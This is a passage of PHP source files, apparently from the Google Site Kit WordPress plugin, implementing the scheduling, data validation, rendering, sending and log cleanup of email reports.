$this->schedule_next_fallback( $batch_id, $frequency, $initiator_timestamp, 20 * MINUTE_IN_SECONDS ); return; } if ( $this->batch_query->is_complete( $batch_id ) ) { return; } $this->schedule_next_fallback( $batch_id, $frequency, $initiator_timestamp ); $this->worker_task->handle_callback_action( $batch_id, $frequency, $initiator_timestamp ); } /** * Checks if a worker lock exists for the given frequency. * * @since 1.168.0 * * @param string $frequency Frequency slug. * @return bool True if a lock is present. */ private function is_worker_locked( $frequency ) { $transient_name = sprintf( 'googlesitekit_email_reporting_worker_lock_%s', $frequency ); return (bool) get_transient( $transient_name ); } /** * Schedules the next fallback event. * * @since 1.168.0 * * @param string $batch_id Batch identifier. * @param string $frequency Frequency slug. * @param int $initiator_timestamp Initiator timestamp. * @param int $delay Optional. Delay in seconds. Default one hour. */ private function schedule_next_fallback( $batch_id, $frequency, $initiator_timestamp, $delay = HOUR_IN_SECONDS ) { $target_time = time() + $delay; $event_delay = max( 0, $target_time - (int) $initiator_timestamp ); $this->scheduler->schedule_fallback( $batch_id, $frequency, $initiator_timestamp, $event_delay ); } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Report_Data_Section_Part * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use InvalidArgumentException; /** * Single email report section part. * * @since 1.167.0 * @access private * @ignore */ class Email_Report_Data_Section_Part { /** * Unique section key. * * @since 1.167.0 * @var string */ private $section_key; /** * Section title. * * @since 1.167.0 * @var string */ private $title; /** * Labels for the section rows/series. * * @since 1.167.0 * @var array */ private $labels; /** * Values formatted as strings for output. * * @since 1.167.0 * @var array */ private $values; /** * Optional trends matching values. * * @since 1.167.0 * @var array|null */ private $trends; /** * Optional event_names matching values. * * @since 1.170.0 * @var array|null */ private $event_names; /** * Optional date range data. * * @since 1.167.0 * @var array|null */ private $date_range; /** * Optional dashboard deeplink URL. * * @since 1.167.0 * @var string|null */ private $dashboard_link; /** * Dimension names. * * @since 1.170.0 * * @var array */ private $dimensions = array(); /** * Dimension values. * * @since 1.170.0 * * @var array */ private $dimension_values = array(); /** * Constructor. * * @since 1.167.0 * * @param string $section_key Unique section key. * @param array $section_data Section data (title, labels, values, optional trends, date_range, dashboard_link). * * @throws InvalidArgumentException When validation fails. */ public function __construct( $section_key, $section_data ) { if ( ! is_string( $section_key ) || '' === $section_key ) { throw new InvalidArgumentException( 'section_key must be a non-empty string' ); } if ( ! is_array( $section_data ) ) { throw new InvalidArgumentException( 'section_data must be an array' ); } $this->set_title( $section_data['title'] ?? null ); $this->set_labels( $section_data['labels'] ?? null ); $this->set_values( $section_data['values'] ?? null ); $this->set_trends( $section_data['trends'] ?? null ); $this->set_event_names( $section_data['event_names'] ?? null ); $this->set_date_range( $section_data['date_range'] ?? null ); $this->set_dashboard_link( $section_data['dashboard_link'] ?? null ); $this->set_dimensions( $section_data['dimensions'] ?? null ); $this->set_dimension_values( $section_data['dimension_values'] ?? null ); $this->section_key = $section_key; } /** * Gets the section key. * * @since 1.167.0 * * @return string Section key. */ public function get_section_key() { return $this->section_key; } /** * Gets the title. * * @since 1.167.0 * * @return string Title. */ public function get_title() { return $this->title; } /** * Gets labels. * * @since 1.167.0 * * @return array Labels list. */ public function get_labels() { return $this->labels; } /** * Gets values. * * @since 1.167.0 * * @return array Values list. */ public function get_values() { return $this->values; } /** * Gets trends. * * @since 1.167.0 * * @return array|null Trends list or null. */ public function get_trends() { return $this->trends; } /** * Gets event names. * * @since 1.170.0 * * @return array|null Event names list or null. */ public function get_event_names() { return $this->event_names; } /** * Gets date range. * * @since 1.167.0 * * @return array|null Date range data or null. */ public function get_date_range() { return $this->date_range; } /** * Gets dashboard link. * * @since 1.167.0 * * @return string|null Dashboard link or null. */ public function get_dashboard_link() { return $this->dashboard_link; } /** * Gets dimensions. * * @since 1.170.0 * * @return array Dimensions list. */ public function get_dimensions() { return $this->dimensions; } /** * Gets dimension values. * * @since 1.170.0 * * @return array Dimension values list. */ public function get_dimension_values() { return $this->dimension_values; } /** * Validates and assigns title. * * @since 1.167.0 * * @param string $title Title. * * @throws InvalidArgumentException When validation fails. */ private function set_title( $title ) { if ( ! is_string( $title ) || '' === $title ) { throw new InvalidArgumentException( 'title must be a non-empty string' ); } $this->title = $title; } /** * Validates and assigns labels. * * @since 1.167.0 * * @param array $labels Labels. * * @throws InvalidArgumentException When validation fails. */ private function set_labels( $labels ) { if ( ! is_array( $labels ) ) { throw new InvalidArgumentException( 'labels must be an array' ); } $this->labels = $labels; } /** * Validates and assigns values. * * @since 1.167.0 * * @param array $values Values. * * @throws InvalidArgumentException When validation fails. */ private function set_values( $values ) { if ( ! is_array( $values ) ) { throw new InvalidArgumentException( 'values must be an array' ); } $this->values = $values; } /** * Validates and assigns trends. * * @since 1.167.0 * * @param array|null $trends Trends data. * * @throws InvalidArgumentException When validation fails. */ private function set_trends( $trends ) { if ( null === $trends ) { $this->trends = null; return; } if ( ! is_array( $trends ) ) { throw new InvalidArgumentException( 'trends must be an array or null' ); } $this->trends = $trends; } /** * Validates and assigns event names. * * @since 1.170.0 * * @param array $event_names Event names. * * @throws InvalidArgumentException When validation fails. */ private function set_event_names( $event_names ) { if ( null === $event_names ) { $this->event_names = null; return; } if ( ! is_array( $event_names ) ) { throw new InvalidArgumentException( 'event_names must be an array or null' ); } $this->event_names = $event_names; } /** * Validates and assigns date range. * * @since 1.167.0 * * @param array|null $date_range Date range data. * * @throws InvalidArgumentException When validation fails. */ private function set_date_range( $date_range ) { if ( null === $date_range ) { $this->date_range = null; return; } if ( ! is_array( $date_range ) ) { throw new InvalidArgumentException( 'date_range must be an array or null' ); } // Validate presence of keys if provided. foreach ( array( 'startDate', 'endDate' ) as $required_key ) { if ( empty( $date_range[ $required_key ] ) ) { throw new InvalidArgumentException( 'date_range must contain startDate and endDate' ); } } $compare_start_provided = ! empty( $date_range['compareStartDate'] ); $compare_end_provided = ! empty( $date_range['compareEndDate'] ); if ( ! $compare_start_provided || ! $compare_end_provided ) { throw new InvalidArgumentException( 'date_range must contain both compareStartDate and compareEndDate when comparison dates are provided' ); } $this->date_range = array( 'startDate' => $date_range['startDate'], 'endDate' => $date_range['endDate'], ); if ( $compare_start_provided && $compare_end_provided ) { $this->date_range['compareStartDate'] = $date_range['compareStartDate']; $this->date_range['compareEndDate'] = $date_range['compareEndDate']; } } /** * Validates and assigns dashboard link. * * @since 1.167.0 * * @param string|null $dashboard_link Dashboard link. * * @throws InvalidArgumentException When validation fails. */ private function set_dashboard_link( $dashboard_link ) { if ( null === $dashboard_link ) { $this->dashboard_link = null; return; } if ( ! filter_var( $dashboard_link, FILTER_VALIDATE_URL ) ) { throw new InvalidArgumentException( 'dashboard_link must be a valid URL string or null' ); } $this->dashboard_link = $dashboard_link; } /** * Sets dimensions. * * @since 1.170.0 * * @param array|null $dimensions Dimensions. * * @throws InvalidArgumentException When validation fails. */ private function set_dimensions( $dimensions ) { if ( null === $dimensions ) { $this->dimensions = array(); return; } if ( ! is_array( $dimensions ) ) { throw new InvalidArgumentException( 'dimensions must be an array' ); } $this->dimensions = $dimensions; } /** * Sets dimension values. * * @since 1.170.0 * * @param array|null $dimension_values Dimension values. * * @throws InvalidArgumentException When validation fails. */ private function set_dimension_values( $dimension_values ) { if ( null === $dimension_values ) { $this->dimension_values = array(); return; } if ( ! is_array( $dimension_values ) ) { throw new InvalidArgumentException( 'dimension_values must be an array' ); } $this->dimension_values = $dimension_values; } /** * Whether the section is empty (no values or all empty strings). * * @since 1.167.0 * * @return bool Whether the section is empty. */ public function is_empty() { if ( empty( $this->values ) ) { return true; } foreach ( $this->values as $value ) { if ( '' !== trim( $value ) ) { return false; } } return true; } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Report_Sender * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use Google\Site_Kit\Core\Email\Email; use WP_Error; use WP_User; /** * Renders and sends email reports. * * @since 1.170.0 * @access private * @ignore */ class Email_Report_Sender { /** * Template renderer factory. * * @since 1.170.0 * @var Email_Template_Renderer_Factory */ private $template_renderer_factory; /** * Email sender instance. * * @since 1.170.0 * @var Email */ private $email_sender; /** * Constructor. * * @since 1.170.0 * * @param Email_Template_Renderer_Factory $template_renderer_factory Template renderer factory. * @param Email $email_sender Email sender instance. */ public function __construct( Email_Template_Renderer_Factory $template_renderer_factory, Email $email_sender ) { $this->template_renderer_factory = $template_renderer_factory; $this->email_sender = $email_sender; } /** * Renders and sends the report email. * * Renders both HTML and plain text versions of the email and sends * them as a multipart/alternative MIME email. * * @since 1.170.0 * * @param WP_User $user Recipient user. * @param array $sections_payload Sections payload. * @param array $template_data Template data. * @return true|WP_Error True on success, WP_Error on failure. */ public function send( WP_User $user, $sections_payload, $template_data ) { $renderer = $this->template_renderer_factory->create( $sections_payload ); if ( ! $renderer instanceof Email_Template_Renderer ) { return new WP_Error( 'email_report_renderer_missing', __( 'Unable to render email template.', 'google-site-kit' ) ); } $html_content = $this->render_template( $renderer, $template_data ); if ( is_wp_error( $html_content ) ) { return $html_content; } $text_content = $this->render_text_template( $renderer, $template_data ); if ( is_wp_error( $text_content ) ) { return $text_content; } $send_result = $this->email_sender->send( $user->user_email, $template_data['subject'] ?? '', $html_content, array(), $text_content ); if ( is_wp_error( $send_result ) || false === $send_result ) { return is_wp_error( $send_result ) ? $send_result : new WP_Error( 'email_report_send_failed', __( 'Failed to send email report.', 'google-site-kit' ) ); } return true; } /** * Renders the email HTML. * * @since 1.170.0 * * @param Email_Template_Renderer $renderer Template renderer instance. * @param array $template_data Template data. * @return string|WP_Error Rendered HTML or WP_Error. */ private function render_template( Email_Template_Renderer $renderer, $template_data ) { $rendered = $renderer->render( 'email-report', $template_data ); if ( is_wp_error( $rendered ) ) { return $rendered; } if ( '' === trim( $rendered ) ) { return new WP_Error( 'email_report_render_failed', __( 'Unable to render email template.', 'google-site-kit' ) ); } return $rendered; } /** * Renders the email plain text. * * @since 1.170.0 * * @param Email_Template_Renderer $renderer Template renderer instance. * @param array $template_data Template data. * @return string|WP_Error Rendered plain text or WP_Error. */ private function render_text_template( Email_Template_Renderer $renderer, $template_data ) { $rendered = $renderer->render_text( 'email-report', $template_data ); if ( is_wp_error( $rendered ) ) { return $rendered; } if ( '' === trim( $rendered ) ) { return new WP_Error( 'email_report_text_render_failed', __( 'Unable to render plain text email template.', 'google-site-kit' ) ); } return $rendered; } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Template_Renderer_Factory * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use Google\Site_Kit\Context; /** * Factory for creating Email_Template_Renderer instances. * * @since 1.170.0 * @access private * @ignore */ class Email_Template_Renderer_Factory { /** * Plugin context instance. * * @since 1.170.0 * * @var Context */ private $context; /** * Constructor. * * @since 1.170.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Creates a template renderer for the provided sections payload. * * @since 1.170.0 * * @param array $sections_payload Sections payload. * @return Email_Template_Renderer Template renderer instance. */ public function create( array $sections_payload ) { return new Email_Template_Renderer( new Sections_Map( $this->context, $sections_payload ) ); } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Frequency_Planner * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use DateInterval; use DateTimeImmutable; use DateTimeZone; use InvalidArgumentException; use Google\Site_Kit\Core\User\Email_Reporting_Settings; /** * Calculates the next occurrence for email reporting schedules. * * @since 1.167.0 * @access private * @ignore */ class Frequency_Planner { /** * Calculates the next run timestamp for a given frequency. * * @since 1.167.0 * * @param string $frequency Frequency to calculate for. * @param int $timestamp Base UNIX timestamp. * @param DateTimeZone $time_zone Site timezone. * @return int UNIX timestamp for the next run. * @throws InvalidArgumentException When an unsupported frequency is provided. */ public function next_occurrence( $frequency, $timestamp, DateTimeZone $time_zone ) { switch ( $frequency ) { case Email_Reporting_Settings::FREQUENCY_WEEKLY: return $this->get_next_weekly_occurrence( $timestamp, $time_zone ); case Email_Reporting_Settings::FREQUENCY_MONTHLY: return $this->get_next_monthly_occurrence( $timestamp, $time_zone ); case Email_Reporting_Settings::FREQUENCY_QUARTERLY: return $this->get_next_quarterly_occurrence( $timestamp, $time_zone ); } throw new InvalidArgumentException( sprintf( 'Unsupported frequency "%s".', $frequency ) ); } /** * Gets the next weekly occurrence honouring the site "week starts on" setting. * * @param int $timestamp Current timestamp. * @param DateTimeZone $time_zone Site timezone. * @return int Next weekly occurrence timestamp. */ private function get_next_weekly_occurrence( $timestamp, DateTimeZone $time_zone ) { $start_of_week = (int) get_option( 'start_of_week', 0 ); $current = $this->immutable_from_timestamp( $timestamp, $time_zone ); // Anchor scheduling to the very start of the calendar day. $day_start = $current->setTime( 0, 0, 0 ); // ISO weekday index where Sunday=0 and Saturday=6, matching WordPress' start_of_week option. $current_wday = (int) $current->format( 'w' ); // Figure out how many days to move forward to land on the configured week start. $days_until_target = ( $start_of_week - $current_wday + 7 ) % 7; // If today is already the target weekday but the time has passed, shift to the following week. if ( 0 === $days_until_target && $current >= $day_start ) { $days_until_target = 7; } $next = $day_start->add( new DateInterval( 'P' . $days_until_target . 'D' ) ); return $next->getTimestamp(); } /** * Gets the next monthly occurrence (first day of next month at 00:00:00). * * @param int $timestamp Current timestamp. * @param DateTimeZone $time_zone Site timezone. * @return int Next monthly occurrence timestamp. */ private function get_next_monthly_occurrence( $timestamp, DateTimeZone $time_zone ) { $current = $this->immutable_from_timestamp( $timestamp, $time_zone ); $next_month = $current ->setTime( 0, 0, 0 ) ->modify( 'first day of next month' ); return $next_month->getTimestamp(); } /** * Gets the next quarterly occurrence (first day of the next quarter at 00:00:00). * * @param int $timestamp Current timestamp. * @param DateTimeZone $time_zone Site timezone. * @return int Next quarterly occurrence timestamp. */ private function get_next_quarterly_occurrence( $timestamp, DateTimeZone $time_zone ) { $current = $this->immutable_from_timestamp( $timestamp, $time_zone )->setTime( 0, 0, 0 ); // Calendar month number in the local timezone (January=1 … December=12). $current_month = (int) $current->format( 'n' ); // Translate month into its offset within the quarter (0 => first month, 1 => second, 2 => third). $position = ( ( $current_month - 1 ) % 3 ); $months_to_add = 3 - $position; $next_quarter = $current->add( new DateInterval( 'P' . $months_to_add . 'M' ) ); // After jumping to the quarter’s first month, land on day 1 at midnight. $next_quarter = $next_quarter->modify( 'first day of this month' ); return $next_quarter->getTimestamp(); } /** * Creates a timezone-adjusted immutable date. * * @param int $timestamp Base timestamp. * @param DateTimeZone $time_zone Site timezone. * @return DateTimeImmutable DateTimeImmutable instance. */ private function immutable_from_timestamp( $timestamp, DateTimeZone $time_zone ) { return ( new DateTimeImmutable( '@' . $timestamp ) )->setTimezone( $time_zone ); } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Monitor_Task * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use Google\Site_Kit\Core\User\Email_Reporting_Settings as User_Email_Reporting_Settings; /** * Restores missing initiator schedules for email reporting. * * @since 1.167.0 * @access private * @ignore */ class Monitor_Task { /** * Scheduler instance. * * @since 1.167.0 * * @var Email_Reporting_Scheduler */ private $scheduler; /** * Settings instance. * * @since 1.167.0 * * @var Email_Reporting_Settings */ private $settings; /** * Constructor. * * @since 1.167.0 * * @param Email_Reporting_Scheduler $scheduler Scheduler instance. * @param Email_Reporting_Settings $settings Email reporting settings. */ public function __construct( Email_Reporting_Scheduler $scheduler, Email_Reporting_Settings $settings ) { $this->scheduler = $scheduler; $this->settings = $settings; } /** * Handles the monitor cron callback. * * The monitor ensures each initiator schedule exists and recreates any * missing ones without disturbing existing events. * * @since 1.167.0 */ public function handle_monitor_action() { if ( ! $this->settings->is_email_reporting_enabled() ) { return; } foreach ( array( User_Email_Reporting_Settings::FREQUENCY_WEEKLY, User_Email_Reporting_Settings::FREQUENCY_MONTHLY, User_Email_Reporting_Settings::FREQUENCY_QUARTERLY ) as $frequency ) { if ( wp_next_scheduled( Email_Reporting_Scheduler::ACTION_INITIATOR, array( $frequency ) ) ) { continue; } $this->scheduler->schedule_initiator_once( $frequency ); } } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Report_Options\Report_Options * * @package Google\Site_Kit\Core\Email_Reporting\Report_Options * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting\Report_Options; /** * Base helper for building email reporting report options. * * @since 1.167.0 * @access private * @ignore */ abstract class Report_Options { /** * Current period date range. * * @since 1.167.0 * * @var array */ private $current_range; /** * Compare period date range. * * @since 1.167.0 * * @var array */ private $compare_range; /** * Constructor. * * @since 1.167.0 * * @param array $date_range Current period range array containing `startDate` and `endDate`. * @param array $compare_range Optional. Compare period range array containing `startDate` and `endDate`. * @throws \InvalidArgumentException When the required date range payload is missing. */ public function __construct( $date_range, $compare_range = array() ) { if ( empty( $date_range ) ) { throw new \InvalidArgumentException( 'Email reporting date range is required.' ); } $this->current_range = $this->normalize_range( $date_range, 'date range' ); $this->compare_range = $this->normalize_range( $this->extract_compare_range( $date_range, $compare_range ), 'compare date range' ); } /** * Applies the current (and optional compare) date range to the report options. * * @since 1.167.0 * * @param array $options Base report options. * @param bool $include_compare Optional. Whether to include compare dates. Default false. * @return array Report request options array with applied date ranges. */ protected function with_current_range( $options, $include_compare = false ) { $options['startDate'] = $this->current_range['startDate']; $options['endDate'] = $this->current_range['endDate']; if ( $include_compare ) { $options['compareStartDate'] = $this->compare_range['startDate']; $options['compareEndDate'] = $this->compare_range['endDate']; } return $options; } /** * Gets a combined range spanning compare start to current end. * * @since 1.167.0 * * @return array Combined date range spanning compare start to current end. */ protected function get_combined_range() { return array( 'startDate' => $this->compare_range['startDate'], 'endDate' => $this->current_range['endDate'], ); } /** * Gets the current period range values. * * @since 1.167.0 * * @return array Current period range array. */ protected function get_current_range_values() { return $this->current_range; } /** * Gets the compare period range values. * * @since 1.167.0 * * @return array Compare period range array. */ protected function get_compare_range_values() { return $this->compare_range; } /** * Normalizes and validates the provided range. * * @since 1.167.0 * * @param array $range Potential date range. * @param string $label Human friendly label used in exceptions. * @throws \InvalidArgumentException When required start or end dates are absent. * @return array Normalized date range array. */ private function normalize_range( $range, $label ) { if ( empty( $range['startDate'] ) || empty( $range['endDate'] ) ) { throw new \InvalidArgumentException( sprintf( 'Email reporting %s must include startDate and endDate.', $label ) ); } return array( 'startDate' => $range['startDate'], 'endDate' => $range['endDate'], ); } /** * Extracts the compare range array. * * @since 1.167.0 * * @param array $date_range Current period range (possibly containing compare keys). * @param array $compare_range Explicit compare range override. * @return array Compare range payload. */ private function extract_compare_range( $date_range, $compare_range ) { if ( ! empty( $compare_range ) ) { return $compare_range; } $keys = array( 'startDate' => $date_range['compareStartDate'] ?? null, 'endDate' => $date_range['compareEndDate'] ?? null, ); return $keys; } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Log_Cleanup * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; /** * Handles scheduled cleanup for email reporting logs. * * @since 1.167.0 * @access private * @ignore */ class Email_Log_Cleanup { /** * Maximum age for email logs before deletion (in seconds). * * @since 1.167.0 */ private const MAX_LOG_AGE = 6 * MONTH_IN_SECONDS; /** * Number of posts to delete per batch. * * @since 1.167.0 */ private const DELETE_CHUNK_SIZE = 30; /** * Settings instance. * * @since 1.167.0 * * @var Email_Reporting_Settings */ private $settings; /** * Constructor. * * @since 1.167.0 * * @param Email_Reporting_Settings $settings Settings instance. */ public function __construct( Email_Reporting_Settings $settings ) { $this->settings = $settings; } /** * Handles the cleanup cron action. * * Deletes email log posts older than six months when the feature is enabled. * * @since 1.167.0 */ public function handle_cleanup_action() { $lock_handle = $this->acquire_lock(); if ( ! $this->settings->is_email_reporting_enabled() || ! $lock_handle ) { return; } try { do { // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions.get_posts_get_posts $post_ids = get_posts( $this->build_cleanup_query_args( self::DELETE_CHUNK_SIZE ) ); foreach ( $post_ids as $post_id ) { wp_delete_post( $post_id, true ); } } while ( ! empty( $post_ids ) ); } finally { delete_transient( $lock_handle ); } } /** * Builds the cleanup query arguments for expired email logs. * * @since 1.167.0 * * @param int $posts_per_page Number of posts to fetch per request. * @return array Query arguments for expired email log posts. */ private function build_cleanup_query_args( $posts_per_page ) { $cutoff = gmdate( 'Y-m-d', time() - self::MAX_LOG_AGE ); return array( 'post_type' => Email_Log::POST_TYPE, 'post_status' => $this->get_valid_statuses(), 'fields' => 'ids', 'posts_per_page' => $posts_per_page, 'orderby' => 'ID', 'order' => 'ASC', 'no_found_rows' => true, 'cache_results' => false, 'update_post_meta_cache' => false, 'update_post_term_cache' => false, 'date_query' => array( array( 'before' => $cutoff, 'column' => 'post_date_gmt', ), ), ); } /** * Gets the list of valid email log post statuses. * * @since 1.167.0 * * @return string[] Valid post statuses. */ private function get_valid_statuses() { return array( Email_Log::STATUS_SENT, Email_Log::STATUS_FAILED, Email_Log::STATUS_SCHEDULED, ); } /** * Attempts to acquire the cleanup lock. * * @since 1.167.0 * * @return string|false Transient name on success, false if lock already held. */ private function acquire_lock() { $transient_name = 'googlesitekit_email_reporting_cleanup_lock'; if ( get_transient( $transient_name ) ) { return false; } set_transient( $transient_name, time(), 5 * MINUTE_IN_SECONDS ); return $transient_name; } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Log_Processor * * @package Google\Site_Kit\Core\Email_Reporting * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use WP_Error; use WP_Post; use WP_User; /** * Processes individual email log records. * * @since 1.170.0 * @access private * @ignore */ class Email_Log_Processor { /** * Email log batch query helper. * * @since 1.170.0 * @var Email_Log_Batch_Query */ private $batch_query; /** * Email reporting data requests service. * * @since 1.170.0 * @var Email_Reporting_Data_Requests */ private $data_requests; /** * Email template formatter. * * @since 1.170.0 * @var Email_Template_Formatter */ private $template_formatter; /** * Email report sender. * * @since 1.170.0 * @var Email_Report_Sender */ private $report_sender; /** * Constructor. * * @since 1.170.0 * * @param Email_Log_Batch_Query $batch_query Batch query helper. * @param Email_Reporting_Data_Requests $data_requests Data requests helper. * @param Email_Template_Formatter $template_formatter Template formatter. * @param Email_Report_Sender $report_sender Report sender. */ public function __construct( Email_Log_Batch_Query $batch_query, Email_Reporting_Data_Requests $data_requests, Email_Template_Formatter $template_formatter, Email_Report_Sender $report_sender ) { $this->batch_query = $batch_query; $this->data_requests = $data_requests; $this->template_formatter = $template_formatter; $this->report_sender = $report_sender; } /** * Processes a single email log record. * * @since 1.170.0 * * @param int $post_id Email log post ID. * @param string $frequency Frequency slug. */ public function process( $post_id, $frequency ) { $this->batch_query->increment_attempt( $post_id ); $email_log = $this->get_email_log( $post_id ); if ( null === $email_log ) { return; } $user = $this->get_user_from_log( $email_log ); if ( is_wp_error( $user ) ) { $this->mark_failed( $post_id, $user ); return; } $date_range = $this->get_date_range_for_log( $email_log ); if ( is_wp_error( $date_range ) ) { $this->mark_failed( $post_id, $date_range ); return; } $raw_payload = $this->data_requests->get_user_payload( $user->ID, $date_range ); if ( is_wp_error( $raw_payload ) ) { $this->mark_failed( $post_id, $raw_payload ); return; } $sections = $this->build_sections_for_log( $email_log, $user, $raw_payload ); if ( is_wp_error( $sections ) ) { $this->mark_failed( $post_id, $sections ); return; } $template_payload = $this->build_template_payload_for_log( $sections, $frequency, $date_range ); if ( is_wp_error( $template_payload ) ) { $this->mark_failed( $post_id, $template_payload ); return; } $sections_payload = isset( $template_payload['sections_payload'] ) ? $template_payload['sections_payload'] : array(); $template_data = isset( $template_payload['template_data'] ) ? $template_payload['template_data'] : array(); $send_result = $this->report_sender->send( $user, $sections_payload, $template_data ); if ( is_wp_error( $send_result ) ) { $this->mark_failed( $post_id, $send_result ); return; } $this->mark_sent( $post_id ); } /** * Retrieves a valid email log post. * * @since 1.170.0 * * @param int $post_id Post ID. * @return WP_Post|null Email log post or null when invalid. */ private function get_email_log( $post_id ) { $email_log = get_post( $post_id ); if ( ! $email_log instanceof WP_Post ) { return null; } if ( Email_Log::POST_TYPE !== $email_log->post_type ) { return null; } return $email_log; } /** * Resolves a valid report user from the email log. * * @since 1.170.0 * * @param WP_Post $email_log Email log post. * @return WP_User|WP_Error User instance or WP_Error. */ private function get_user_from_log( WP_Post $email_log ) { $user = get_user_by( 'id', (int) $email_log->post_author ); if ( ! $user instanceof WP_User ) { return new WP_Error( 'invalid_email_reporting_user', __( 'Invalid user for email reporting data.', 'google-site-kit' ) ); } return $user; } /** * Retrieves a valid date range for an email log. * * @since 1.170.0 * * @param WP_Post $email_log Email log post. * @return array|WP_Error Date range or error. */ private function get_date_range_for_log( WP_Post $email_log ) { $date_range = Email_Log::get_date_range_from_log( $email_log ); if ( empty( $date_range ) ) { return new WP_Error( 'email_report_invalid_date_range', __( 'Email report date range is invalid.', 'google-site-kit' ) ); } return $date_range; } /** * Builds sections for a log payload. * * @since 1.170.0 * * @param WP_Post $email_log Email log post. * @param WP_User $user User receiving the report. * @param array $raw_payload Raw payload. * @return array|WP_Error Sections array or WP_Error. */ private function build_sections_for_log( WP_Post $email_log, WP_User $user, $raw_payload ) { $sections = $this->template_formatter->build_sections( $raw_payload, $email_log, $user ); if ( is_wp_error( $sections ) ) { return $sections; } if ( empty( $sections ) ) { return new WP_Error( 'email_report_no_data', __( 'No email report data available.', 'google-site-kit' ) ); } return $sections; } /** * Builds template payload for an email log. * * @since 1.170.0 * * @param array $sections Sections data. * @param string $frequency Frequency slug. * @param array $date_range Date range. * @return array|WP_Error Template payload or WP_Error. */ private function build_template_payload_for_log( $sections, $frequency, $date_range ) { return $this->template_formatter->build_template_payload( $sections, $frequency, $date_range ); } /** * Marks a log post as failed. * * @since 1.170.0 * * @param int $post_id Post ID. * @param WP_Error|string $error Error details. */ private function mark_failed( $post_id, $error ) { $this->batch_query->update_status( $post_id, Email_Log::STATUS_FAILED ); update_post_meta( $post_id, Email_Log::META_ERROR_DETAILS, $error ); } /** * Marks a log post as sent. * * @since 1.170.0 * * @param int $post_id Post ID. */ private function mark_sent( $post_id ) { wp_update_post( array( 'ID' => $post_id, 'post_status' => Email_Log::STATUS_SENT, 'post_date' => current_time( 'mysql' ), 'post_date_gmt' => current_time( 'mysql', 1 ), ) ); delete_post_meta( $post_id, Email_Log::META_ERROR_DETAILS ); } } <?php /** * Class Google\Site_Kit\Core\Email_Reporting\Email_Reporting_Settings * * @package Google\Site_Kit * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email_Reporting; use Google\Site_Kit\Core\Storage\Setting; /** * Class for Email Reporting settings. * * @since 1.161.0 * @access private * @ignore */ class Email_Reporting_Settings extends Setting { /** * The option name for this setting. */ const OPTION = 'googlesitekit_email_reporting'; /** * Returns the expected value type. * * @since 1.161.0 * * @return string The type of the setting. */ public function get_type() { return 'object'; } /** * Gets the default value. * * @since 1.161.0 * * @return array The default value. */ protected function get_default() { return array( 'enabled' => true, ); } /** * Gets the sanitize callback. * * @since 1.161.0 * * @return callable The sanitize callback. */ protected function get_sanitize_callback() { return function ( $value ) { $new_value = $this->get(); if ( isset( $value['enabled'] ) ) { $new_value['enabled'] = (bool) $value['enabled']; } return $new_value; }; } /** * Checks if email reporting is enabled. * * @since 1.161.0 * * @return bool True if email reporting is enabled, false otherwise. */ public function is_email_reporting_enabled() { $settings = $this->get(); return (bool) $settings['enabled']; } } <?php /** * Class Google\Site_Kit\Core\Dashboard_Sharing\View_Only_Pointer * * @package Google\Site_Kit * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Dashboard_Sharing; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Admin\Pointer; use Google\Site_Kit\Core\Permissions\Permissions; /** * Class for view-only pointer. * * @since 1.83.0. * @access private * @ignore */ final class View_Only_Pointer { const SLUG = 'googlesitekit-view-only-pointer'; /** * Plugin context. * * @since 1.166.0 * @var Context */ private $context; /** * Constructor. * * @since 1.166.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Registers functionality through WordPress hooks. * * @since 1.83.0 */ public function register() { add_filter( 'googlesitekit_admin_pointers', function ( $pointers ) { $pointers[] = $this->get_view_only_pointer(); return $pointers; } ); } /** * Gets the view-only pointer. * * @since 1.83.0. * @since 1.166.0 Updated to work with extended Pointer class. * * @return Pointer Admin notice instance. */ private function get_view_only_pointer() { return new Pointer( self::SLUG, array( 'title' => sprintf( '%s %s', __( 